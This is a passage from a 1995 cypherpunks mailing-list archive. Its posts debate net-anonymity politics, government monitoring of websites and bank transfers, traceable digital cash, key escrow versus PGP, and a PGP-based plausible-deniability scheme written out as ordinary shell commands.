stance that does not make him (John Q.) pro-porn.  This last is a huge
flaw in the current battle for free speech on the net, IMO.  (Thank
you Marty Rimm.)  If this issue could be refocused, I think that
John Q. (and Jane) would find it much easier to support.

The second plank that could be potentially advanced is anonymity.  Anonymous
remailers in particular, but the benefits of anonymity to users of the
Net in general as well.

I propose that we get some likely candidate (actually, a similar candidate
to the one above) to advocate the benefits of anonymity on the net.  The
"spin" that would have to be used would depend on the particular candidate,
but let's for example we have:

     Candidate Posturing                    Required Spin
     -----------------------------------------------------------------
     Pro-business, tough on crime           anonymous crime tip e-mail
                                            a la Fed whistleblower stuff,
                                            and the SPA

     Pro-choice, womens' vote               anonymous support services


Of course, there are many more examples, but we'd have to see which postures
this campaign's candidates are going to pick.  Of course, I am somewhat
cynical in my advocation of the particular "Required Spins" (the SPA support,
especially), but I feel that the threats to privacy and public use of strong
encryption (which walks hand in hand with the use of the remailers, naturally)
are worth the potential risk on other fronts (the burgeoning software patent
silliness, eg).

You may ask why these candidates would be interested in this type of thing,
and my response is that they can be forced.  The religious right has no
problem bringing their agenda into the public spotlight and forcing their
issues onto candidates because of their willingness to use hyperbole and 
fanaticism (not to mention pressure on advertisers and other sponsors).

I believe that netizens in general, and cypherpunks in particular can
bring similar, and more reasoned, pressure to bear.  I think that our
job is easier than the religious right because it should be trivial to
enlist the support of the mainstream press on these issues, and to direct
the anti-federal ire that has been building in the US.  In addition,
Democratic candidates that are currently in office would love to have some
way of attacking the Republican plans for this session of Congress.  An
attack on net.censorship via the CDA and the telecomm bill could be seen
as the ideal place to attack the Republican agenda, and thereby the
success of Republican candidates in the presidential race.

<whew.>

Let the flames begin.

- - David C. Lambert
  dcl@panix.com
  (finger for public key)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFcB+qpplsfgM88VAQFdewP9G0aHVTweUeCMa7J7Xhtu2R4cID6yP/J3
7WS5OicRWfl/hPRXj1Db74A9tDrkStEfobbL/2H6CsO9N4wZNgcDLQAa5MjX8ujf
0EF6v57nlcANb1qLJ5kmwfGj96PUMDtw00409tin3KssRAL0uz/lL9SWP/Mhj9q5
emZHYW3VC3c=
=bTsO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Wed, 13 Sep 95 09:11:42 PDT
To: cypherpunks@toad.com
Subject: Dirty Pix Ad
Message-ID: <199509131611.MAA28295@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times, Sept 13, 1995.


Scientist urges action on Internet pornography

By Clive Cookson


Pornography accounts for about half of non-academic use of the
Internet, the global computer network, the British Association
science conference heard yesterday.

Prof Harold Thimbleby, professor of computing research at
Middlesex University, said most parents, politicians and
educators had no idea how easy it was to find graphic
descriptions of horrific perversions, through any personal
computer linked to the net.

"If you want to know about any perversion, you can find full
details," Prof Thimbleby said, "and they are described in
deceitful and evil ways."

He was particularly upset by Internet porn sites that
masquerade as victim support groups, such as those for child
abuse that tell paedophiles how to entrap children. "I have
found text, film and sound material that I find extremely
disturbing, for example instructions for killing minors for
sexual gratification."

Prof Thimbleby has been researching the pattern of traffic on
the Internet since the beginning of the year.

It is impossible to monitor how more than a tiny fraction of
the estimated 30m to 40m users utilise the net. But Prof
Thimbleby analysed a representative sample of "bulletin
boards" and of searches made via so-called "web crawlers"
which act like telephone directories for the World Wide Web,
the fastest growing part of the Internet.

He said his conclusion - that pornography accounted for about
50 per cent of the searches - tallied with recent US findings
about the dominance of porn on the net.

"There is no reliable way, technical or otherwise, to detect
or intercept pornography," Prof Thimbleby said.

Censorship of the Internet was impossible, because
pornographers could easily disguise their material. And
censoring programs such as SurfWatch and Internet Filter could
not cope with all the fast-changing pornographic material.

Because censorship was technically and politically
impractical, Prof Thimbleby suggested that a better response
was to dilute the pornography with other material.
"The Internet has very little interesting material for the
non-specialist user. It needs more," he said. "When it has
more, it is just possible that pornography will slip into its
statistically appropriate place, one aspect of humanity but
not the most prominent on the Internet."

-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Wed, 13 Sep 95 09:15:56 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Software vs Money Laundering
In-Reply-To: <199509131549.LAA22502@panix.com>
Message-ID: <Pine.3.89.9509131257.A17575-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 13 Sep 1995, Duncan Frissell wrote:

> At 10:48 AM 9/13/95 -0400, John Young wrote:
> 
> >      Can artificial intelligence be used to combat crime by
> >      ferreting out money laundering? Officials at law
> >      enforcement, defense and intelligence agencies like to
> >      think so. They have suggested creating a sophisticated
> >      computer program to screen records of the more than
> >      700,000 electronic money transfers involving U.S.
> >      institutions each day and to flag suspicious ones for
> >      further investigation. By using AI, they hope to stop
> >      some of the $300 billion in profits from drug deals and
> >      other illegal activities that they estimate is laundered
> >      world-wide each year. But in a report issued yesterday,
> >      the congressional Office of Technology Assessment says
> >      any such plan would face considerable obstacles.
> >      [Cyberian Joel Reidenberg, an OTA advisor, is quoted.]
> >
> 
> Not the least of which is that money launderers can use "AI Software" to
> generate a stream of real and dummy money transfers that emulates "normal"
> money transfers.  Not to mention the fact that monopoly money transfer
> networks that can be surveilled by the Feds (FEDWIRE and SWIFT) are not long
> for this world.  They will be replaced by encrypted, open, net-based systems.


The article failes to point out that this system - actually one much 
larger in scope already exists as Treasury's FINCEN system, headed by a 
former Army AI expert. FINCEN sifts all the bank transfer manifests and, 
last I looked, had stuck tentacles into other agency's databases to 
further collate and refine its focus - now toward locating potential 
targets.  FINCEN was only supposed to be marshalled for Justice 
Department investigations of suspected money laundering. Next, it'll be 
used to auto-author warrants and indictments. . .





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Wed, 13 Sep 95 10:52:48 PDT
To: "David C. Lambert" <dcl@panix.com>
Subject: Re: An opportunity not to be missed
In-Reply-To: <199509131610.MAA26686@panix.com>
Message-ID: <Pine.SUN.3.91.950913134743.7787A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995, David C. Lambert wrote:

> I propose that we get some likely candidate (actually, a similar candidate
> to the one above) to advocate the benefits of anonymity on the net.  

Try Harry Browne (http://www.rahul.net/browne).  I'm 100% certain that he 
would be willing to support cryptographic rights and freedom of internet 
speech.

> You may ask why these candidates would be interested in this type of thing,
> and my response is that they can be forced.  The religious right has no
> problem bringing their agenda into the public spotlight and forcing their
> issues onto candidates because of their willingness to use hyperbole and 
> fanaticism (not to mention pressure on advertisers and other sponsors).

The Religious Right brings their agenda to the public spotlight because
they become incredibly involved in local politics on a nationwide basis
and have the knowledge, means, and money to influence politics at this
level.  Very few people who are outside the political process realize the
amount of organization, dedication, and dollars required to achieve
political validity. 

-Thomas Edwards





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 13 Sep 95 14:24:10 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <ac7b776f120210047e03@[205.199.118.202]>
Message-ID: <199509132121.OAA05728@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM:
> Although I am
>thought of as a "crypto anarchist," and basically am such a thing, the fact
>is that there aren't a lot of trials for thoughtcrime in this country. I
>have some doubts about the circumstances surrounding Danny Casolaro's
>death, though, so I don't say all is rosy and perfect. 

amusingly, on one of those web sites, the death of Casolaro is indeed
tied in with the conspiracy that "touched" (to say the least <g>)
Vince Foster.

the Whitehouse web hits are potentially interesting. I agree they
don't imply any "dissident web monitoring program". the question of
how high a staffer hit those pages and for what reasons is still
unanswered. if it was indeed just Joe Sixpack on a presidential
tour, playing with the machines, not even employed with the whitehouse, 
or perhaps some bored college intern, then I agree that nothing significant 
is going on. but it is fun to fantasize about Hillary or Bill getting
an eyeful and thinking that *pornography* on the internet pales in
comparison to *this* little problem!! <g>

now, those "dissident" web sites are not as innocuous as you might think. 
they are not run-of-the mill "I hate the president and republicans too" sites.
one of them is the absolute master repository on the internet for
all the rampant, hardcore Foster conspiracy theories talking about
NSA bank spying, whitewater, etc. these are *not* something you would find 
in a library, or expect anyone without an interest in conspiracy theories 
to be reading. and from what the article suggests, the browsing was
pretty thorough. it would be interesting to ask the site maintainer,
something I might do.

I suspect that a lot of this Foster stuff is going to hit the media big
time when the mud starts to sling during the presidential election,
when it really counts. I think that someone is sitting on a lot
of anti-clinton ammo. the 3rd candidate possibilities are very strong
in 96, because of all the junk coating the Republicrats and Demopublicans.

recall that the "october surprise" suspicions regarding Reagan really
hit the media big time, and supposedly that was a highly secret 
intelligence operation. so I think that there is a kind of rough
government accountability, it's just that it only happens about every
4 years or so and is *awfully* messy.. <g>



--Vlad Nuri






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 13 Sep 95 14:22:36 PDT
To: cypherpunks@toad.com
Subject: Digital Cash on sci.crypt
Message-ID: <199509132121.OAA25994@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


There has been some discussion on sci.crypt of digital cash and its
facilitation of kidnapping, extortion, etc.  Here is a posting I made
when mentions an on-line paper on the topic.  I had met the author,
Markus Jakobsson, at Crypto 95, but I only had a chance to check out his
web site yesterday.


awc@slcawc.aug.ipp-garching.mpg.de (Arthur Carlson TOK ) writes:

>[In response to a discussion of whether digital cash could be used to
>provide anonymous collection of ransom money]

>Is there really no technical fix for this? To enable the prevention of
>double spending in off-line systems, the ID of the withdrawer is coded
>into the coins in a way that is verified by the bank. If the victim's
>relatives can undo enough of the code to satisfy the bank, why can't
>they undo the rest to detect when the coins are spent? Alternatively,
>why can't the bank put an identifier on the coins (in a way that isn't
>destroyed by the unblinding) that amounts to a message encoded in the
>public key of the withdrawer? Then the withdrawer can make the
>destination of the ransom money visible by revealing his private key
>(after the victim has been released, of course). (He also reveals
>every dime he spent in the last year and all his kinky love letters,
>but, hey, we're trying to catch a kidnapper here.)

There has been considerable discussion of this problem in the
literature recently.  A paper I found yesterday on the net is by Markus
Jakobsson and Moti Yung: Revokable and Versatile Electronic Money, at
<URL:http://www-cse.ucsd.edu/users/markus/revoke.ps> (postscript
format).  It has references to other work as well.

The specific attack I discussed earlier applies to the current DigiCash
scheme (or at least how it is assumed to work).  Offline cash systems
would be more complicated.  The references in the paper mentioned above
describe how these attacks would work on such systems and some ways of
avoiding them.

However there is a more powerful attack, which the Jakobsson paper
addresses, in which the bank as a whole is coerced.  Maybe terrorists
threaten to blow up the World Trade Center unless Citibank engages in a
specific protocol which will leave the terrorists with millions of
dollars in fully blinded electronic cash.  Even if the normal withdrawal
protocol has signatures, etc. which would prevent this, Jakobsson shows
that there is a corrupted protocol which if the bank is forced to follow
it will leave the criminals with valid but untraceable electronic cash.

The solution in the paper is to make it so that none of the ecash
issued by the bank is untraceable.  Under normal use it is anonymous,
but if necessary the authorities can break the anonymity.  This is
sometimes called "Clipper cash" after the U.S. Clipper chip proposal
which had similar privacy properties.

With Jakobsson/Yung's approach even the more powerful attack can be
defeated because the cash is traceable, and no amount of coercion will
allow the attacker to create valid but untraceable cash.

While these approaches are technically interesting, the political
implications are more ominous.  While Jakobsson labels the entity who has
the power to break the anonymity an "ombudsman", implying that he defends
the interests of the cash holder, he could equally well be called a
"policeman" because he is the one who catches the criminals.  It is all a
matter of how you look at it.

The question is whether these various threats of kidnapping, blackmail,
extortion, etc. are good enough reasons to go to a cash system where
privacy is protected only at the sufferance of government agencies.
There are plenty of precedents for governments misusing supposedly-
private information, such as the use of phone records to track down
those who resisted the German regime during World War II.  One of the
attractive aspects of electronic cash has been its immunity to this form
of governmental coercion.  The overwhelmingly negative response to the
Clipper chip proposal (other than in the cryptographic and law
enforcement communities) may apply to Clipper cash as well.

A related issue is the possible competition of rival cash systems.  As
with Clipper, where it would apparently be necessary to forbid the use of
alternatives, so with Clipper cash it would seem that people would prefer
true anonymity over conditional protection, even if you call the cash
tracer an "ombudsman".  So there would seem to be a need for governments
to criminalize the use of fully anonymous electronic cash in order to
force people to use the ones which the government could track.  Whether
this will even be possible in an increasingly global financial system
remains to be seen.

Hal Finney
hfinney@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 13 Sep 95 11:33:00 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <199509131412.KAA26837@panix.com>
Message-ID: <Pine.D-G.3.91.950913141437.24669A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995, Duncan Frissell wrote:

> At 06:03 PM 9/12/95 -0400, Brian Davis wrote:
> 
> >Unbelievable!!!  To add to this distressing truth, I have learned that 
> >the White House also subscribes to a number of newspapers and periodicals 
> >which are reviewed for things of interest to the Administration and to 
> >the President. I I I I I I ammmmmmmmmm shocked!
> 
> The government, as you no doubt know, sometimes operates under different
> rules.  Thus when the "Red Squad" (Intelligence Division) of the New York
> City Police (located in that big building on the North side of Vandam
> between Greenwich and Houston BTW) was sued for maintaining files on "lawful
> protest groups" they entered into a consent agreement to refrain from this
> sort of thing.  Later, the courts said that this agreement meant that the
> cops couldn't even listen to WLIB radio (NYC's favorite radical
> African-American station) to find out in advance where rallies were going to be.
>
I am not familiar with this incident, but I note that state authorities, 
not federal, were involved according to your post.  Was the consent 
decree also filed in state court?  And even if it was in federal court, 
was the legal theory on which the plaintiffs proceeded based on NY state 
law or federal law??  
 
> Since the White House is doing this reading of sites with public funds and
> since that institution is the most powerful in the world --- it can nuke its
> enemies, for example --- people are naturally interested to discover if they
> are the subject of an investigation.
> 
The White House also reads publicly available newspapers and magazines (I 
assume).  How is accessing a Web site different from that?

> This is a demonstration of the unintended effect of electronic surveillance
> technology.  The fact is that it can do more harm to the authorities than to

Is the World Wide Web your idea of "electronic surveillance 
technology"??  I would agree that packet sniffing is a different problem, 
but accessing an open Web site seems reasonable to me.  Would you prefer 
that the staffers use home computers to do this (in an attempt to hide 
their tracks)?  As far as I know, this was all done openly and the Web 
site chose, right or wrong, to reveal the contents of their log files to 
someone.  Again, what about the complaints heard in this forum recently 
about law enforcement's obtaining similar log files from the Web site set 
up regarding the child's kidnapping?

> the public.  The Nixon Tapes/The Thompson Square Park Riot Video/The Rodney
> King Video.  Since those in power are more interesting than ordinary people,
> they represent a more "target-rich environment."  Information about their
> activities has greater commercial value and is thus more likely to see the
> light of day.

Not only "those in power" but those in the public eye/public figures.  On 
that rationale, Phil Zimmermann is probably a public figure with respect 
to encryption ...


> DCF
> 
> "There are more of us than there are of you."
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
That, of course, depends on what you mean by "us" and "you."

EBD


Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Wed, 13 Sep 95 11:57:21 PDT
To: cypherpunks@toad.com
Subject: Re: An opportunity not to be missed
Message-ID: <199509131857.OAA08914@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Thomas Grant Edwards <tedwards@Glue.umd.edu> wrote:
> The Religious Right brings their agenda to the public spotlight
> because they become incredibly involved in local politics on a
> nationwide basis and have the knowledge, means, and money to
> influence politics at this level.  Very few people who are outside
> the political process realize the amount of organization, dedication,
> and dollars required to achieve political validity.

This is a well made point, and I certainly do not claim to be one
of those who has an internal understanding of the political process.

I submit that the frenzied coverage of the presidential campaign
*severely reduces* the required knowledge, means and money, needed
to raise issues to the fore, and that furthermore, a lot of the "means
and money" that you mention are used for communication and organization.

Of course, an organized campaign on the Net is essentially free,
but for the cost in time.  It is my opinion that the political power
of the Net is just starting to awaken, and that a perception of
impotence in the political process, is just that - a perception.

David C. Lambert
dcl@panix.com
(finger for PGP public key)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFcpYKpplsfgM88VAQF8lgP8CViP3ggK68e5l6KGTqcI/2uHp0cP6z9t
a2etUdxH0QBuyWu3MVVsWuB+6n6QcRSO69rh0E/U5apzqJoPMdirbLt8B/cMdsAg
yY4vfEhGLZkuG5470uP9GKR6TF00YiZmfIoXtfDJPmbfcRwj018S1xe7myeGyLJm
ARpzGgrYR30=
=r3ff
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kari Laine" <buster@klaine.pp.fi>
Date: Wed, 13 Sep 95 05:03:23 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" and net monitoring
Message-ID: <199509131202.AA15294@personal.eunet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> From:          lindat@iquest.net (Linda Thompson, American Justice Federation)

> >    The  National  Security   Agency   presumably   can   monitor
> >subversive  communication  on  the  Internet  without leaving any
> >trace  by  "sniffing  packets"  at  traffic  nodes. 

Well they are just doing what their charter says they
should be doing - gathering information.

> >    It turns out that computers from inside the White House  have
> >kept  pretty  good  tabs  on information available on Whitewater,
> >Vince Foster, and Mena at a few key repositories  on  the  World-
> >Wide Web, a subset of the Internet.

I think that's because White House workers has access to 
net and of course they are surfing like all the rest of us
- they are just people you know :-) If that would be 
part of something hard level information gathering
I assure you they would not leave so clear traces.

> >Office  of the President between August 28 and August 31.  If the
> >White House is showing a similar interest in other sites  on  the
> >World  Wide  Web,  that would amount to a monitoring operation of
> >considerable magnitude. 

So are you saying White House by itself checked out those places
or are you saying that *people* working inside the White House
happened to be interested issues available on those sites and 
accessed them. And so what it is public information when it
is on the WWW - isn't it?


> >    In light of this information, I have the following questions:
My guesses are

> >(1) Does this constitute "casual browsing" by White House staff, or
> >    is it, in light of the considerable time and effort spent during 
> >    regular business hours, part of a monitoring or intelligence operation?

Probably both 

> >(2) For what purpose is the information transferred to the White House used?

Probably to read it and maybe learn something from it :-)

> >(3) Does the White House keep information from these web sites on file,
> >    and does the White House keep a file on the persons responsible for
> >    these web sites?

Hell I am keeping my own records and on the other hand I am in the
process to get/buy/snatch/built a system where I could automatically
scan all the newsgroups with some kind of AI system and to keep
an eye on certain FTP, GOPHER,WAIS, WWW and so on to keep
me bether informed. This partly because this information from 
interne is getting out of proportion AND quite a big part of it
is just rubbish and wasting your time. 

> >(4) Is the April 9 statement by David Lytel of the White House Office of
> >    Science and Technology to Amy Bauer of Copley News Service that the
> >    administration does not monitor anti-Clinton activity on the web still
> >    operative?

Probably they do and they really should. If I was Mr. Clinton (which 
I luckily am not) I would want my adjudats to prepare a report for
me each morning summing up all the possible comments round 
subject Clinton and The USA from NET: That would be very precisious
source of feedback to finetune your acts. And that information 
is real time.

Totally another thing which somehow belongs to this subject
should intelligence bodies watch for the net.

I am middle reading Spycatcher book. Btw I don't understand
all the hype rouund it and I would say in that book there is
not enough substance to ban it's printing in certain countries.

Anyway again in that book it becomes clear that the most
riskiest part of the agent and therefore on of the best way
to unweil them is to concentrate on their communications
with the coordinators in that particular country or on 
the communication directed to country behind the operation.

So clearly to make agents more succesfull their coummication
is the one needing new techniques - how about internet?
It is accessible almost everywhere and you can get an 
account without giving your real identity. By using certain
sites you just call in from telephone box give few information
or in some places none and you are ready for almost 
totally untraceable communication. I bet they are using
it already a lot to replace clumsy readio communication.

Don't get me wrong I vote for freedom of speech(whitch is 
getting slimmer), privacy (witch there is not much left), 
no regulation on encryption (which is not going to be)
but I don't like these things used against my country's
security and steal our intellectual property.

Based on this I tend to think every self respecting 
intelligence organization must have those taps 
otherwise they are not doing their job properly.

> "When even one American -- who has done nothing wrong -- is forced by fear
> to shut his mind and close his mouth, then all Americans are in peril."
> Harry Truman

Truman might have been one of the best presidents US ever had
but talk is talk and deeds are deeds.


Comments and reasoning is totally my own imagination 
my employer would propably disabprove them and
certainly not they don't represent my employers 
opinions.

Be carefull out there ...

Best Regards
Kari Laine
Kari Laine          buster@klaine.pp.fi
LAN Vision Oy       Tel. +358-0-502 1947
Sinikalliontie 14   Fax  +358-0-524 149
02630 ESPOO         BBS  +358-0-502 1576/1456
FINLAND




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org (Hallam@w3.org)
Date: Wed, 20 Sep 95 17:16:30 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" and net monitoring
Message-ID: <9509201551016603@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 13 Sep 95 11:18:14 -0400
From: hallam@w3.org


>> >(4) Is the April 9 statement by David Lytel of the White House Office of
>> >    Science and Technology to Amy Bauer of Copley News Service that the
>> >    administration does not monitor anti-Clinton activity on the web still
>> >    operative?

>Probably they do and they really should. If I was Mr. Clinton (which 
>I luckily am not) I would want my adjudats to prepare a report for
>me each morning summing up all the possible comments round 
>subject Clinton and The USA from NET: That would be very precisious
>source of feedback to finetune your acts. And that information 
>is real time.

Nope they don't the Democratic party aides do that type of work from Democrat 
HQ.

The President gets a once a week summary of all the mail he gets including the 
email.  I think they also provide a daily press digest.

By monitoring Lytel was probably thinking about installing net sniffers etc or 
obtaining the data from the FBI or whoever. I am certain he didn't mean to say 
that he does not surf the net ever and does not occasionaly visit opposition 
sites. 

The term monitor implies an organised search and continuous checking proceedure
the number of hits cited sounds more like somone passed round the URL of a kook
site inside the office.

        Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 13 Sep 95 12:26:55 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Can GAK be made "not interoperable" with PGP?
Message-ID: <199509131926.PAA14444@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 AM 9/13/95 -0700, Timothy C. May wrote:

>But is this even possible, to make a GAK system "not interoperable" with,
>say, PGP?
>
>Unless the GAK system has some sort of entropy analyzer, and can recognize
>high-entropy sources which it presumes to be encrypted data (*), one can of
>course PGP-encrypt a text file and then GAK the resulting file.

I took it to mean that they were saying that an approved program on one end
of a communication exchange could not exchange encrypted messages or
established an encrypted session of some kind with an un approved program on
the other end.  Not trying to outlaw superencryption (PGP on both ends using
a GAKed channel) but GAK on one end working with an unapproved system on the
other end.  A ringer GAK-work-alike that would defeat the intent of GAK.

I don't know if the government can prevent that with a software-only system
or indeed if half a secure system can be made completely secure.

DCF

"Markets and open systems beat governments and closed systems."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 13 Sep 95 12:27:18 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <199509131926.PAA14458@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 AM 9/13/95 -0700, Timothy C. May wrote:

>While I have had some qualms about the name, on balance I think it has been
>good for us. After all, it's not as if _other_ groups don't already exist!
>In particular, the British branch of Cypherpunks disliked the name
>"Cypherpunks" so much that they used a different name for themselves, the
>"U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for
>whatever reasons. But the name may have been a factor, at least.

Note too that Brits differ from Americans.  "Wired" worked well here from
the beginning but has had problems there.  Differing national characteristics.

DCF

"Let's all just agree to disagree.  My system can thrive with widespread
disagreement among rabid individualists --- can yours?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Wed, 13 Sep 95 07:28:22 PDT
To: ab411@detroit.freenet.org
Subject: Re: Scientology tries to break PGP - and
Message-ID: <759.9509131426@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Why would they use your copy of the program to decrypt the file?
> They could just use a version that lacked this 'feature'.  Of
> course, they still couldn't get at the real plaintext unless you
> gave them the key, but you are right back to the same old standoff
> where they say, "Give us your key," and you (try to) say, "No."

I agree, you can't rely on them using your doctored program, it must
be resilient to them having a copy of all of your software, and their
own fresh copies of software, and a backup of each copy before
starting, and still provide pluasible deniability.

Here's an idea to do just that, perhaps something which could be added
to a future PGP.

I reckon this is what you'd do:

% pgp -es duress
% pgp -es msg
% stealth < msg.pgp > msg.stl
% cat msg.stl >> duress.pgp
% pgp +makerandom=1234 noise
% cat noise >> duress.pgp
% pgp -a duress.pgp
% mail someone < duress.asc

The pgp +makerandom=<size> <file> is an undocumented feature of pgp >
2.6 (not sure exactly when it got added, Colin Plumb pointed it out
when I asked him about ran nos for stealth).

So what this means is that you are using PGP it's self to hide a
stegoed message.  This would be good for the guy from FACTnet
(forgotten his name) who just got hit by the CoS, he could hold out
for a while, then give up his key, the duress message would appear,
and the real message would be explained by having a script to do this
on his HD, and having long since burned the disk with a script to do
the above on it:

% pgp -es msg
% pgp +makerandom=4567 noise
% cat noise >> msg.pgp
% pgp -a msg.pgp
% mail someone < msg.asc

ie the idea is that you pad your message to a fixed size for the
express purpose of hampering traffic analysis (of the type of my,
Alice did have a lot to say to Bob that day).  It would be even better
cover if the thing had gotten sent through a remailer, as this kind of
thing is expected of type I remailer traffic (before mixmaster which
does the packetizing for you).

So the duress message really looks like this:

+---------+---------------------------+--------------------+--------+
| pgp hdr | IDEA encrypted duress msg | stealthed real msg | noise  |
+---------+---------------------------+--------------------+--------+

the IDEA block has a length field, but you can increase the length
without damage to include the following stealthed stuff as the
underlying stuff which is IDEA encrypted will know it's length on
decryption, and the following junk will just be discarded.

So, Alice and her secret key ring (encrypted) gets nabbed by the
Charlie (CoS?), and coerced into divuling her passphrase.

And if and when it is noticed that the message was longer than it
ought to be (CoS that smart? substitute the NSA and they'd notice for
sure), Alice explains away the junk on the end by pointing them to the
fact that all of her messages where exactly (say) 16k long, and that
she was using a the noise only script, and that the message really is
this:

+---------+---------------------------+-----------------------------+
| pgp hdr | IDEA encrypted duress msg | noise                       |
+---------+---------------------------+-----------------------------+

Having this built-in to PGP provides plausible deniablity as you have
no extra software which might look incriminating unless you managed to
dispose of it first, if it comes as stock.  Even as a standalone it
would be feasible, but you'd need to be careful to hide the first
script, maybe on an encrypted drive or something.  This is not good
tho as you ideally want nothing left, just a standard pgp
implementation, and they have no way to prove anything, they can be
suspicious, but suspicion can't put you in jail, and if you say there
is no message, only random junk for padding purposes to foil traffic
analysis this would be plausible, especially if they really had
captured a whole load of 64k messages.

You really need to use stealth2 for that, as stealth1.x gives the game
away for determined attackers, but for stealth2, I need some
cryptographic opinions on whether this is secure:

	0 < x < N

N is RSA modulus, and converting that to a number x' in the range:

	0 < x' < 2^(int(log2(N) + 1) + 64)

(ie the next power of 2 over N multiplied by 2^64)

and the transformation supplied by:

	x' = N * f(MD5(x)) + x

where f(y) is a function which converts from range 0 <= y < 2^128 to a
range 0 <= f(y) < scale.  Scale some constant defined in terms of N,
and n other randomisation.

Is that safe?

x is random, and will be different even for a repeat encryption of the
same file, as PGP is using a random IDEA session key.

So are there any brute force attacks on that which would be cheaper
than attacking 128 bit IDEA?  PGP's random number generator also makes
extensive use of MD5, so I'm taking the use of MD5 as secure as a
given.

If it is thought to be dangerous for some reason (it is after all some
kind of signature on it's self, presume that you know N, and x' but
not x, the question is can the equation be brute force reversed in a
less than 128 bit brute force attack.  I'm neglecting to consider the
rand() calls, which I'm not expecting to add security, but are just a
mechanism to stir the value with to get more random nos, as
occasionally the alogrithm needs more than one, if the first fails,
etc.

The other approach, presuming that you can get to the data before they
can, is to use secure drive, and securely wipe (or physically destroy
- data on floppy) the encrypted key.  Then you can give your
passphrase without concern.  Could land you in trouble for destruction
of evidence or some such tho, so innocent, plausible deniability would
be better.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 13 Sep 95 15:28:19 PDT
To: cypherpunks@toad.com
Subject: Re: Can GAK be made "not interoperable" with PGP?
Message-ID: <199509132227.PAA03114@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Duncan Frissell <frissell@panix.com>
> At 10:26 AM 9/13/95 -0700, Timothy C. May wrote:
> 
> >But is this even possible, to make a GAK system "not interoperable" with,
> >say, PGP?
> >
> >Unless the GAK system has some sort of entropy analyzer, and can recognize
> >high-entropy sources which it presumes to be encrypted data (*), one can of
> >course PGP-encrypt a text file and then GAK the resulting file.
> 
> I took it to mean that they were saying that an approved program on one end
> of a communication exchange could not exchange encrypted messages or
> established an encrypted session of some kind with an un approved program on
> the other end.  Not trying to outlaw superencryption (PGP on both ends using
> a GAKed channel) but GAK on one end working with an unapproved system on the
> other end.  A ringer GAK-work-alike that would defeat the intent of GAK.

Yes, I think this was the idea of the original "software key escrow"
proposal, from TIS as I recall.  The sender would encode the session key
with a government public key but there was some trick by which the
receiver would verify that the session key was in fact encoded correctly
and refuse to operate if it was wrong.  So any attempt to corrupt or
remove the LEAF would be detected if you were talking to a compliant
receiver.

That is part of why Matt Blaze's Clipper attacks were so significant,
because they went to the heart of this requirement.  It was always clear
that you could superencrypt with Clipper, but Matt found a way in which
you could send a LEAF which would be accepted by a regular Clipper phone
but which had bogus data for law enforcement.  So this defeated the
requirement of not interoperating with rogues.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 13 Sep 95 15:56:36 PDT
To: adam@bwh.harvard.edu
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <9509132252.AA20787@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
